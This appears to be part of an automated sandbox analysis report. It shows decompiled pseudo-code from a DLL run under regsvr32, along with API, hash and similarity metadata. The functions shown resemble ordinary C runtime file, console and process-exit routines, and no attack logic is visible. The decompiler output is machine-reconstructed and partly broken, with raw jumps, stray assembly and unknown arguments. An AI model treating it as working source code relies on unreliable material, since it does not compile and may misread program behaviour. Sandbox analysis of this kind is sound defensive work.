                                				 *((long long*)(_t282 + 0x20)) =  *((intOrPtr*)(_t279 - 0x51));
                                				 *((intOrPtr*)(_t279 - 0x55)) = r14d;
                                				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                                				if (_t193 != 0xffffffff) goto 0x130f27f2;
                                				GetLastError();
                                				E00007FFC7FFC130EE630(_t150, _t193, _t206);
                                				 *( *((intOrPtr*)(0x13124970 + ( *_t275 >> 6) * 8)) + (( *_t275 & 0x0000003f) << 6) + 0x38) =  *( *((intOrPtr*)(0x13124970 + ( *_t275 >> 6) * 8)) + (( *_t275 & 0x0000003f) << 6) + 0x38) & 0x000000fe;
                                				_t144 = E00007FFC7FFC130F3DB0(_t149, _t150, _t152, _t206, _t275, _t277);
                                				goto 0x130f24bb;
                                				 *((long long*)( *((intOrPtr*)(0x13124970 + ( *_t275 >> 6) * 8)) + (( *_t275 & 0x0000003f) << 6) + 0x28)) = _t193;
                                				return _t144;
                                			}


                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                • String ID:
                                • API String ID: 1330151763-0
                                • Opcode ID: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                                • Instruction ID: 25588ca94b627607ef5f1f763dcafdefba288fa573b939a7fcf0709a7b59f7d7
                                • Opcode Fuzzy Hash: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                                • Instruction Fuzzy Hash: 31C1CD36B28E598AEB54CF64D9513AC37A5FB48BA8F014235CA2E677D5CF38E425C310
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 84%
                                			E00007FFC7FFC130F5864(void* __ebx, signed int __ecx, void* __edx, void* __ebp, long long* __rax, long long __rbx, long long __rdx, long long __r8) {
                                				signed char _t114;
                                				signed char _t115;
                                				void* _t119;
                                				void* _t134;
                                				void* _t140;
                                				intOrPtr _t146;
                                				char _t147;
                                				char _t148;
                                				void* _t152;
                                				void* _t153;
                                				unsigned int _t156;
                                				short _t157;
                                				void* _t161;
                                				long long* _t201;
                                				signed long long _t202;
                                				signed long long _t204;
                                				intOrPtr _t205;
                                				intOrPtr _t210;
                                				intOrPtr _t212;
                                				intOrPtr* _t221;
                                				long long* _t224;
                                				signed long long _t229;
                                				void* _t231;
                                				intOrPtr _t232;
                                				signed long long _t248;
                                				signed long long _t250;
                                				signed long long _t255;
                                				DWORD* _t257;
                                				short* _t264;
                                				void* _t272;
                                				void* _t277;
                                				signed long long _t280;
                                				void* _t282;
                                				signed long long _t283;
                                				long long* _t284;
                                				long long _t286;
                                				short* _t288;
                                				void* _t295;
                                				long _t299;
                                				void* _t301;
                                				void* _t304;
                                				void* _t306;
                                				signed long long _t308;
                                				char* _t309;
                                				char* _t310;
                                
                                				_t286 = __r8;
                                				_t152 = __edx;
                                				 *((long long*)(_t282 + 0x18)) = __rbx;
                                				 *((long long*)(_t282 + 0x10)) = __rdx;
                                				_t283 = _t282 - 0x60;
                                				r12d = r8d;
                                				if (r13d != 0xfffffffe) goto 0x130f58a5;
                                				E00007FFC7FFC130EE680(__rax);
                                				 *__rax = 0;
                                				E00007FFC7FFC130EE6A0(__rax);
                                				 *__rax = 9;
                                				goto 0x130f5cae;
                                				if (_t231 < 0) goto 0x130f5c97;
                                				_t161 = r13d -  *0x13124d70; // 0x40
                                				if (_t161 >= 0) goto 0x130f5c97;
                                				r8d = 1;
                                				 *((long long*)(_t283 + 0x48)) = __r8;
                                				_t280 = (__ecx & 0x0000003f) << 6;
                                				_t248 = __ecx >> 6;
                                				 *(_t283 + 0x40) = _t248;
                                				_t201 =  *((intOrPtr*)(0x13124970 + _t248 * 8));
                                				if (( *(_t201 + _t280 + 0x38) & r8b) == 0) goto 0x130f5c97;
                                				if (r12d - 0x7fffffff <= 0) goto 0x130f5911;
                                				E00007FFC7FFC130EE680(_t201);
                                				 *_t201 = 0;
                                				_t114 = E00007FFC7FFC130EE6A0(_t201);
                                				 *_t201 = 0x16;
                                				goto 0x130f5ca9;
                                				if (r12d == 0) goto 0x130f5c93;
                                				if (( *(_t201 + _t280 + 0x38) & 0x00000002) != 0) goto 0x130f5c93;
                                				if (__rdx == 0) goto 0x130f58fa;
                                				_t232 =  *((intOrPtr*)(_t201 + _t280 + 0x28));
                                				r10d =  *((char*)(_t201 + _t280 + 0x39));
                                				asm("retf 0x8844");
                                				_t202 = _t283;
                                				_t284 = _t201;
                                				_t115 = _t114 & 0x000000a0;
                                				 *_t202 =  *_t202 + _t115;
                                				 *((intOrPtr*)(_t232 + 0x2b)) =  *((intOrPtr*)(_t232 + 0x2b)) + _t115;
                                				asm("enter 0x1a74, 0x41");
                                				if ( *((intOrPtr*)(_t232 - 0x75)) != _t114) goto 0x130f5961;
                                				if ((r8b & r12d) == 0) goto 0x130f5976;
                                				r14d = r12d;
                                				goto 0x130f5a0c;
                                				_t204 =  !( !_t202);
                                				if ((r8b & r12d) != 0) goto 0x130f5992;
                                				E00007FFC7FFC130EE680(_t204);
                                				 *_t204 = 0;
                                				_t119 = E00007FFC7FFC130EE6A0(_t204);
                                				 *_t204 = 0x16;
                                				E00007FFC7FFC130EE580(_t119);
                                				goto 0x130f5b18;
                                				r14d = r12d;
                                				r14d = r14d >> 1;
                                				r14d =  <  ? _t153 : r14d;
                                				E00007FFC7FFC130EE154(_t204, _t232 - _t202);
                                				_t229 = _t204;
                                				E00007FFC7FFC130EE114(_t204, 0);
                                				E00007FFC7FFC130EE114(_t204, 0);
                                				_t308 = _t229;
                                				if (_t229 != 0) goto 0x130f59db;
                                				E00007FFC7FFC130EE6A0(_t204);
                                				 *_t204 = 0xc;
                                				E00007FFC7FFC130EE680(_t204);
                                				 *_t204 = 8;
                                				goto 0x130f5b18;
                                				r8d = 1;
                                				E00007FFC7FFC130F5D68(_t204, 0, 0);
                                				_t250 =  *(_t284 + 0x40);
                                				r10b =  *((intOrPtr*)(_t284 + 0xa0));
                                				r8d = 1;
                                				 *( *((intOrPtr*)(0x13124970 + _t250 * 8)) + _t280 + 0x30) = _t204;
                                				_t205 =  *((intOrPtr*)(0x13124970 + _t250 * 8));
                                				 *(_t284 + 0x50) = _t308;
                                				r9d = 0xa;
                                				if (( *(_t205 + _t280 + 0x38) & 0x00000048) == 0) goto 0x130f5aa1;
                                				_t146 =  *((intOrPtr*)(_t205 + _t280 + 0x3a));
                                				if (_t146 == r9b) goto 0x130f5aa1;
                                				if (r14d == 0) goto 0x130f5aa1;
                                				 *_t308 = _t146;
                                				r14d = r14d - 1;
                                				_t309 = _t308 + _t286;
                                				 *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t250 * 8)) + _t280 + 0x3a)) = r9b;
                                				if (r10b == 0) goto 0x130f5aa1;
                                				_t147 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t250 * 8)) + _t280 + 0x3b));
                                				if (_t147 == r9b) goto 0x130f5aa1;
                                				if (r14d == 0) goto 0x130f5aa1;
                                				 *_t309 = _t147;
                                				_t310 = _t309 + _t286;
                                				r14d = r14d - 1;
                                				 *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t250 * 8)) + _t280 + 0x3b)) = r9b;
                                				if (r10b != r8b) goto 0x130f5aa1;
                                				_t148 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t250 * 8)) + _t280 + 0x3c));
                                				if (_t148 == r9b) goto 0x130f5aa1;
                                				if (r14d == 0) goto 0x130f5aa1;
                                				 *_t310 = _t148;
                                				_t156 = __rdx - 7;
                                				_t210 =  *((intOrPtr*)(0x13124970 + _t250 * 8));
                                				r14d = r14d - 1;
                                				 *((intOrPtr*)(_t210 + _t280 + 0x3c)) = r9b;
                                				E00007FFC7FFC130F3EE4(r13d, _t152, _t210);
                                				if (_t210 == 0) goto 0x130f5b36;
                                				_t212 =  *((intOrPtr*)(0x13124970 +  *(_t284 + 0x40) * 8));
                                				if (( *(_t212 + _t280 + 0x38) & 0x00000080) == 0) goto 0x130f5b36;
                                				GetConsoleMode(_t306);
                                				if (_t212 == 0) goto 0x130f5b36;
                                				if ( *((char*)(_t284 + 0xa0)) != 2) goto 0x130f5b3b;
                                				r14d = r14d >> 1;
                                				r8d = r14d;
                                				 *(_t284 + 0x20) = 0;
                                				ReadConsoleW(_t304, _t301, _t299, _t257, _t272);
                                				if (_t212 != 0) goto 0x130f5b2a;
                                				GetLastError();
                                				E00007FFC7FFC130EE630(r13d, _t212, _t229);
                                				E00007FFC7FFC130EE114(_t212, _t229);
                                				goto 0x130f5cb1;
                                				goto 0x130f5b76;
                                				 *((intOrPtr*)(_t284 + 0x48)) = sil;
                                				r8d = r14d;
                                				 *(_t284 + 0x20) = 0;
                                				ReadFile(_t277, ??, ??, ??);
                                				if ( *((intOrPtr*)(_t284 + 0xb8)) == 0) goto 0x130f5c5d;
                                				if ( *((intOrPtr*)(_t284 + 0xb8)) - r12d > 0) goto 0x130f5c5d;
                                				if (( *( *((intOrPtr*)(0x13124970 +  *(_t284 + 0x40) * 8)) + _t280 + 0x38) & 0x00000080) == 0) goto 0x130f5b1b;
                                				if ( *((char*)(_t284 + 0xa0)) == 2) goto 0x130f5bbf;
                                				_t255 = _t310 + _t286;
                                				 *(_t284 + 0x20) = _t299 >> 1;
                                				_t134 = E00007FFC7FFC130F5564(__ebx, r13d, _t156, _t255, _t156,  *((intOrPtr*)(_t284 + 0xa8)));
                                				goto 0x130f5b1b;
                                				if (_t134 == 0) goto 0x130f5c45;
                                				_t288 =  *(_t284 + 0x50);
                                				_t264 = _t288;
                                				_t295 = _t288 + (_t156 >> 1) * 2;
                                				if (_t288 - _t295 >= 0) goto 0x130f5c38;
                                				_t221 = _t288 + 2;
                                				if (r9w == 0x1a) goto 0x130f5c2f;
                                				if (r9w != 0xd) goto 0x130f5c18;
                                				if (_t221 - _t295 >= 0) goto 0x130f5c18;
                                				if ( *_t221 != _t157) goto 0x130f5c18;
                                				 *_t264 = _t157;
                                				goto 0x130f5c28;
                                				 *((intOrPtr*)(_t264 + 2)) = r9w;
                                				if (_t288 + 6 - _t295 < 0) goto 0x130f5beb;
                                				goto 0x130f5c38;
                                				_t224 =  *((intOrPtr*)(0x13124970 + _t255 * 8));
                                				 *(_t224 + _t280 + 0x38) =  *(_t224 + _t280 + 0x38) | 0x00000002;
                                				goto 0x130f5b1b;
                                				E00007FFC7FFC130F5334(r13d, _t156,  *(_t284 + 0x50), _t156 >> 1);
                                				goto 0x130f5bb8;
                                				GetLastError();
                                				if (_t224 != 5) goto 0x130f5c83;
                                				E00007FFC7FFC130EE6A0(_t224);
                                				 *_t224 = 9;
                                				E00007FFC7FFC130EE680(_t224);
                                				 *_t224 = 5;
                                				goto 0x130f5b18;
                                				if (_t224 != 0x6d) goto 0x130f5b11;
                                				goto 0x130f5b1b;
                                				goto 0x130f5cb1;
                                				E00007FFC7FFC130EE680(0);
                                				 *((long long*)(0)) = 0xa;
                                				_t140 = E00007FFC7FFC130EE6A0(0);
                                				 *((long long*)(0)) = 9;
                                				return E00007FFC7FFC130EE580(_t140);
                                			}


                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                • Opcode ID: aa8d70a267aed3f394d20313078fc58160d100e7809d47a18e30dfc31bf5e273
                                • Instruction ID: d87aa89be38254d429dec8f1926e9f76cc9980d3ac39fc49bde44a9cb0598bb5
                                • Opcode Fuzzy Hash: aa8d70a267aed3f394d20313078fc58160d100e7809d47a18e30dfc31bf5e273
                                • Instruction Fuzzy Hash: 23C1F422A1CEAEC7EA648F10994027D6BD9BB80BE8F550174DA4E233D5CF3DD865C360
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                                • Instruction ID: af41ad1a353df793f28d0ed632af6f6e6ff1c393578a34c4022ff524bf2c32b2
                                • Opcode Fuzzy Hash: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                                • Instruction Fuzzy Hash: 0AF0C862B19F5696FF449B15F48027963A0EF8C7A8F541435D90F22664DF3CD494D320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 47%
                                			E00007FFC7FFC130F4AF8(signed long long __ecx, void* __edx, void* __esi, void* __ebp, void* __rax, long long __rbx, signed short* __rdx, void* __r9, long long _a32) {
                                				char _v64;
                                				signed long long _v72;
                                				void* _v84;
                                				unsigned int _v88;
                                				void* _v96;
                                				long long _v100;
                                				signed int _v104;
                                				signed int _v120;
                                				void* __rbp;
                                				void* _t74;
                                				void* _t75;
                                				void* _t94;
                                				intOrPtr _t95;
                                				void* _t96;
                                				void* _t102;
                                				void* _t107;
                                				void* _t128;
                                				signed long long _t142;
                                				intOrPtr _t144;
                                				long long* _t152;
                                				signed long long* _t154;
                                				intOrPtr _t162;
                                				signed short* _t183;
                                				void* _t185;
                                				signed long long _t194;
                                				void* _t195;
                                				signed long long _t197;
                                				signed long long _t198;
                                				signed long long _t200;
                                				void* _t201;
                                				signed short* _t202;
                                
                                				_t192 = __r9;
                                				_t102 = __edx;
                                				_a32 = __rbx;
                                				r15d = r8d;
                                				_t194 = __ecx;
                                				_t183 = __rdx;
                                				if (r8d != 0) goto 0x130f4b26;
                                				goto 0x130f4dc1;
                                				if (__rdx != 0) goto 0x130f4b4a;
                                				E00007FFC7FFC130EE680(0);
                                				 *((long long*)(0)) = 0;
                                				_t74 = E00007FFC7FFC130EE6A0(0);
                                				 *((long long*)(0)) = 0x16;
                                				_t75 = E00007FFC7FFC130EE580(_t74);
                                				goto 0x130f4dc1;
                                				r14d = r14d & 0x0000003f;
                                				_t197 = _t194 >> 6;
                                				_t200 = _t194 << 6;
                                				_v72 = _t197;
                                				_t162 =  *((intOrPtr*)(0x13124970 + _t197 * 8));
                                				_t95 =  *((intOrPtr*)(_t162 + _t200 + 0x39));
                                				if (_t75 - 1 > 0) goto 0x130f4b80;
                                				_t142 =  !(__rbx - 1);
                                				if ((r15d & 0x00000001) == 0) goto 0x130f4b2b;
                                				if (( *(_t162 + _t200 + 0x38) & 0x00000020) == 0) goto 0x130f4b96;
                                				r8d = 2;
                                				E00007FFC7FFC130F5D68(_t142, _t162, 0);
                                				_v88 = 0;
                                				E00007FFC7FFC130F3EE4(r12d, _t102, _t142);
                                				if (_t142 == 0) goto 0x130f4cab;
                                				_t144 =  *((intOrPtr*)(0x13124970 + _t197 * 8));
                                				if (( *(0x13124970 + _t200 + 0x38) & 0x00000080) == 0) goto 0x130f4cab;
                                				E00007FFC7FFC130EF0D4(_t144, __rbx, _t162, 0, __r9);
                                				if ( *((intOrPtr*)( *((intOrPtr*)(_t144 + 0x90)) + 0x138)) != 0) goto 0x130f4bec;
                                				if ( *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t197 * 8)) + _t200 + 0x39)) == dil) goto 0x130f4cab;
                                				GetConsoleMode(??, ??);
                                				if (0x13124970 == 0) goto 0x130f4cab;
                                				if (_t95 == 0) goto 0x130f4c8d;
                                				_t96 = _t95 - 1;
                                				if (_t96 - 1 > 0) goto 0x130f4d48;
                                				_v104 = _v104 & 0;
                                				_t195 = _t183 + _t201;
                                				_t202 = _t183;
                                				_v100 = 0;
                                				if (_t183 - _t195 >= 0) goto 0x130f4d3e;
                                				r13d =  *_t202 & 0x0000ffff;
                                				if (E00007FFC7FFC130F633C(r13w & 0xffffffff) != r13w) goto 0x130f4c7b;
                                				_v100 = 2;
                                				if (r13w != 0xa) goto 0x130f4c70;
                                				r13d = 0xd;
                                				if (E00007FFC7FFC130F633C(r13d) != r13w) goto 0x130f4c7b;
                                				_v100 = 2;
                                				if ( &(_t202[1]) - _t195 >= 0) goto 0x130f4c84;
                                				goto 0x130f4c35;
                                				GetLastError();
                                				_v104 = 0x13124970;
                                				_t198 = _v72;
                                				goto 0x130f4d3e;
                                				r9d = r15d;
                                				E00007FFC7FFC130F446C(r12d, _t107, __esi, 3,  &_v104,  &_v64, _t183, _t192);
                                				asm("movsd xmm0, [eax]");
                                				goto 0x130f4d43;
                                				if (( *( *((intOrPtr*)(0x13124970 + _t198 * 8)) + _t200 + 0x38) & 0x00000080) == 0) goto 0x130f4d0b;
                                				_t128 = _t96;
                                				if (_t128 == 0) goto 0x130f4cf7;
                                				if (_t128 == 0) goto 0x130f4ce3;
                                				if (_t96 - 1 != 1) goto 0x130f4d48;
                                				r9d = r15d;
                                				E00007FFC7FFC130F477C(_t96, r12d, 0x13124970, 3,  &_v104, _t185, _t183);
                                				goto 0x130f4c9f;
                                				r9d = r15d;
                                				E00007FFC7FFC130F4898(r12d, _t107, 0x13124970, 3,  &_v104, _t185, _t183);
                                				goto 0x130f4c9f;
                                				r9d = r15d;
                                				E00007FFC7FFC130F4674(r12d, _t107, 0x13124970, 3,  &_v104, _t185, _t183);
                                				goto 0x130f4c9f;
                                				_v104 = _v104 &  *0x7FFC13124978;
                                				_v120 = _v120 & 0;
                                				r8d = r15d;
                                				_v100 = 0;
                                				WriteFile(??, ??, ??, ??, ??);
                                				if (0 != 0) goto 0x130f4d3b;
                                				GetLastError();
                                				_v104 = 0;
                                				asm("movsd xmm0, [ebp-0x30]");
                                				asm("movsd [ebp-0x20], xmm0");
                                				if (_v88 >> 0x20 != 0) goto 0x130f4dbc;
                                				_t152 = _v88;
                                				if (_t152 == 0) goto 0x130f4d88;
                                				if (_t152 != 5) goto 0x130f4d7b;
                                				E00007FFC7FFC130EE6A0(_t152);
                                				 *_t152 = 9;
                                				E00007FFC7FFC130EE680(_t152);
                                				 *_t152 = 5;
                                				goto 0x130f4b42;
                                				E00007FFC7FFC130EE630(r13d, _t152, 3);
                                				goto 0x130f4b42;
                                				_t154 =  *((intOrPtr*)(0x13124970 + _t198 * 8));
                                				if (( *(0x13124970 + _t200 + 0x38) & 0x00000040) == 0) goto 0x130f4da4;
                                				if ( *_t183 == 0x1a) goto 0x130f4b1f;
                                				E00007FFC7FFC130EE6A0(_t154);
                                				 *0x13124970 = 0x1c;
                                				_t94 = E00007FFC7FFC130EE680(_t154);
                                				 *_t154 =  *_t154 & 0x00000000;
                                				goto 0x130f4b42;
                                				return _t94;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                • Opcode ID: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                                • Instruction ID: 8198741ddaf4f9c2ed38ab7a1c700d2cf715dc8ed07617c4b25deb922127e75a
                                • Opcode Fuzzy Hash: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                                • Instruction Fuzzy Hash: A481BF22B18E2A86FB509F6599406BD26E8BF44BACF424175CE0E337D5DF3CA461C720
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 20%
                                			E00007FFC7FFC130F446C(signed int __edx, void* __edi, void* __esi, long long __rbx, long long* __rcx, void* __rdx, long long __r8, void* __r9, long long _a8) {
                                				signed long long _v72;
                                				char _v80;
                                				intOrPtr _v87;
                                				char _v88;
                                				long long _v96;
                                				long long _v104;
                                				long long _v108;
                                				long long _v112;
                                				int _v116;
                                				char _v120;
                                				signed long long _v128;
                                				signed long long _v136;
                                				long long _v144;
                                				signed int _v152;
                                				int _t76;
                                				int _t77;
                                				long _t80;
                                				signed char _t81;
                                				signed int _t87;
                                				signed long long _t99;
                                				intOrPtr _t103;
                                				signed int _t104;
                                				long long _t106;
                                				long long* _t109;
                                				intOrPtr _t126;
                                				void* _t137;
                                				intOrPtr* _t138;
                                				signed long long _t141;
                                				void* _t143;
                                				void* _t151;
                                				void* _t152;
                                				signed long long _t156;
                                
                                				_a8 = __rbx;
                                				_t99 =  *0x13123760; // 0xe67021d0ea18
                                				_v72 = _t99 ^ _t143 - 0x00000080;
                                				r12d = r9d;
                                				_t156 = __edx >> 6;
                                				_t141 = (__edx & 0x0000003f) << 6;
                                				_v96 = __r8;
                                				_t109 = __rcx;
                                				_t152 = _t151 + __r8;
                                				_t103 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t156 * 8)) + _t141 + 0x28));
                                				_v104 = 0x13124970;
                                				GetConsoleCP();
                                				_v108 = 0x13124970;
                                				 *__rcx = 0;
                                				 *((long long*)(__rcx + 8)) = 0;
                                				if (__r8 - _t152 >= 0) goto 0x130f464a;
                                				r13b =  *((intOrPtr*)(__r8));
                                				_v120 = __edx;
                                				_t126 =  *((intOrPtr*)(0x13124970 + _t156 * 8));
                                				_t81 =  *(_t126 + _t141 + 0x3d);
                                				_t87 = _t81 & 0x00000004;
                                				if (_t87 == 0) goto 0x130f451f;
                                				 *(_t126 + _t141 + 0x3d) = _t81 & 0x000000fb;
                                				r8d = 2;
                                				_v88 =  *((intOrPtr*)(_t126 + _t141 + 0x3e));
                                				_v87 = r13b;
                                				goto 0x130f4564;
                                				E00007FFC7FFC130F1740(_t81 & 0x000000fb, __edx, _t103, __rcx, __rcx,  &_v88, __r9);
                                				if (_t87 == 0) goto 0x130f455b;
                                				if (__r8 - _t152 >= 0) goto 0x130f462a;
                                				r8d = 2;
                                				E00007FFC7FFC130F1654( &_v120, __r8);
                                				if (_t103 == 0xffffffff) goto 0x130f464a;
                                				_t137 = __r8 + 1;
                                				goto 0x130f4576;
                                				r8d = 1;
                                				E00007FFC7FFC130F1654( &_v120, _t137);
                                				if (_t103 == 0xffffffff) goto 0x130f464a;
                                				_v128 = _v128 & 0x00000000;
                                				_t104 =  &_v80;
                                				_v136 = _v136 & 0x00000000;
                                				r9d = 1;
                                				_v144 = 5;
                                				_v152 = _t104;
                                				_t138 = _t137 + 1;
                                				_t76 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                                				r14d = _t76;
                                				if (_t104 == 0) goto 0x130f464a;
                                				_v152 = _v152 & 0x00000000;
                                				r8d = _t76;
                                				_t77 = WriteFile(??, ??, ??, ??, ??);
                                				if (_t104 == 0) goto 0x130f4642;
                                				 *((long long*)(_t109 + 4)) =  *((intOrPtr*)(_t109 + 8)) - _v96 + _t138;
                                				if (_v112 - r14d < 0) goto 0x130f464a;
                                				if (r13b != 0xa) goto 0x130f4622;
                                				_v152 = 0;
                                				r8d = 1;
                                				_v116 = _t77;
                                				WriteFile(??, ??, ??, ??, ??);
                                				if (0xd == 0) goto 0x130f4642;
                                				if (_v112 - 1 < 0) goto 0x130f464a;
                                				 *((long long*)(_t109 + 8)) =  *((long long*)(_t109 + 8)) + 1;
                                				 *((long long*)(_t109 + 4)) =  *((long long*)(_t109 + 4)) + 1;
                                				goto 0x130f44e0;
                                				 *((char*)( *((intOrPtr*)(0x13124970 + _t156 * 8)) + _t141 + 0x3e)) =  *_t138;
                                				_t106 =  *((intOrPtr*)(0x13124970 + _t156 * 8));
                                				 *(_t106 + _t141 + 0x3d) =  *(_t106 + _t141 + 0x3d) | 0x00000004;
                                				 *((long long*)(_t109 + 4)) =  *((long long*)(_t109 + 4)) + 1;
                                				goto 0x130f464a;
                                				_t80 = GetLastError();
                                				 *_t109 = _t106;
                                				E00007FFC7FFC130F6D80();
                                				return _t80;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.641844385.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000003.00000002.641834581.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641880022.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641907930.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641915677.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641932303.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000003.00000002.641940757.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7ffc130e0000_regsvr32.jbxd
                                Similarity
                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                • String ID:
                                • API String ID: 3659116390-0
                                • Opcode ID: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                                • Instruction ID: 9de9824038147a5cd8e5a518f35adca10164798dc89546b3ec1ab7c393af6ecd
                                • Opcode Fuzzy Hash: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                                • Instruction Fuzzy Hash: 7B51D232A18A658AFB10CF25E9443AD37B4FB48BACF148135CE0A67798DF38D165C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 34%
                                			E00007FFC7FFC130EF320(void* __ecx, long long __rbx, void* __rdx, long long __rsi, intOrPtr* __r8, void* __r9) {
                                				signed long long _t61;
                                				signed long long _t65;
                                				intOrPtr _t68;
                                				signed long long _t82;
                                				struct HINSTANCE__* _t91;
                                				signed long long _t92;
                                				signed long long _t97;
                                				long long _t99;
                                				void* _t103;
                                				signed long long _t107;
                                				signed long long _t109;
                                				signed long long _t112;
                                				struct HINSTANCE__* _t113;
                                				long _t116;
                                				void* _t119;
                                				WCHAR* _t121;
                                
                                				 *((long long*)(_t103 + 8)) = __rbx;
                                				 *((long long*)(_t103 + 0x10)) = _t99;
                                				 *((long long*)(_t103 + 0x18)) = __rsi;
                                				r14d = __ecx;
                                				_t109 =  *0x13123760; // 0xe67021d0ea18
                                				_t92 = _t91 | 0xffffffff;
                                				_t82 = _t109 ^  *(0x7ffc130e0000 + 0x44810 + _t119 * 8);
                                				asm("dec eax");
                                				if (_t82 == _t92) goto 0x130ef4a1;
                                				if (_t82 == 0) goto 0x130ef389;
                                				_t61 = _t82;
                                				goto 0x130ef4a3;
                                				if (__r8 == __r9) goto 0x130ef435;
                                				_t97 =  *((intOrPtr*)(__r8));
